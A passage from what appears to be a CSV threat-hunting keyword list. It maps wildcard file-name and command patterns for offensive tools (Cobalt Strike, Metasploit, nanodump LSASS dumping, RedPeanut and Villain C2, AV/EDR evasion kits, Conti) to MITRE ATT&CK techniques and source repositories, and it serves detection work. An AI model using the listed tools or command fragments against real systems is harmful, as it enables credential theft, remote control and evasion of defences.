for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,0,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*socky whoami*,offensive_tool_keyword,cobaltstrike,Winsocket for Cobalt Strike.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/WKL-Sec/Winsocky,1,1,N/A,10,10,79,13,2023-07-06T11:47:18Z,2023-06-22T07:00:22Z -*SOFTWARE\WOW6432Node\FreeFileSync*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*Soledge/BlockEtw*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*solo_mine_example.cmd*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*souravbaghz/RadareEye*,offensive_tool_keyword,RadareEye,Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Network Exploitation tools,https://github.com/souravbaghz/RadareEye,1,1,N/A,N/A,4,338,50,2021-12-11T06:16:37Z,2021-01-07T04:52:58Z -*source/avetsvc.c*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*source/byakugan*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*source/dllinject*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*source/flash_exploiter*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*source/javapayload*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*source/psh_exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*source/shtinkering.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*Source\wdextract\*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*Source\wdextract\zlib\dll_x64\zlibwapi.dll*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*Source\wdextract\zlib\dll_x86\zlibwapi.dll*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*Source\wdextract\zlib\lib\zlibwapi32.lib*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*Source\wdextract\zlib\lib\zlibwapi64.lib*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*SourcePoint*Loader.go*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*source-teamserver.sh*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*spacerunner.exe -i *.ps1* -o *.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*SpaceRunner-master.zip*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,1,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*SpamChannel-main.zip*,offensive_tool_keyword,SpamChannel,poof emails from any of the +2 Million domains using MailChannels,T1566 - T1566.001,TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/byt3bl33d3r/SpamChannel,1,1,N/A,8,3,256,28,2023-09-21T12:25:03Z,2022-12-20T21:31:55Z -*Spartacus.exe --mode proxy*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*Spartacus-main.zip*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,1,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*spartacus-proxy-*.log*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense 
Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*Spartacus-v2.*-x64.zip*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,1,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*spartan-conseil/ratchatpt*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*spartan-conseil/ratchatpt*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*spawn/runshellcode*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*spawn_cmd.dll*,offensive_tool_keyword,POC,POC to check for CVE-2020-0796 /SMBGhost Expected outcome: cmd.exe launched with system access,T1210.001 - T1213 - T1212 - T1201,TA0007 - TA0002,N/A,N/A,Exploitation tools,https://github.com/ZecOps/CVE-2020-0796-LPE-POC,1,1,N/A,N/A,3,242,90,2020-04-02T08:01:38Z,2020-03-30T16:06:50Z -*spawnas * \ HACKER https*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SpawnAsAgentManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*spawnasshellcode*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SpawnAsShellcodeManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SpawneRv6yTYhShell*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*SpawnPPIDAgentManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SpawnShellcode.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SpawnShellcodeManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SpawnTheThing(*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,0,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*spawnto *.exe,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*spawnto */path *,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,0,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*spawnto_x64 -Application *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*'spawnto_x64'*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*spawnto_x64.py*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*spawnto_x86 -Application*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*'spawnto_x86'*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*spawnto_x86.py*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - 
T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*specialtokengroupprivs.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*Spel_RCE_Bash_EXP.py*,offensive_tool_keyword,POC,RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL),T1059 - T1210 - T1507,TA0002 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Spel_RCE_POC.py*,offensive_tool_keyword,POC,RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL),T1059 - T1210 - T1507,TA0002 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE,1,1,N/A,N/A,,N/A,,, -*spiderfoot -l 127.0.0.1:*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
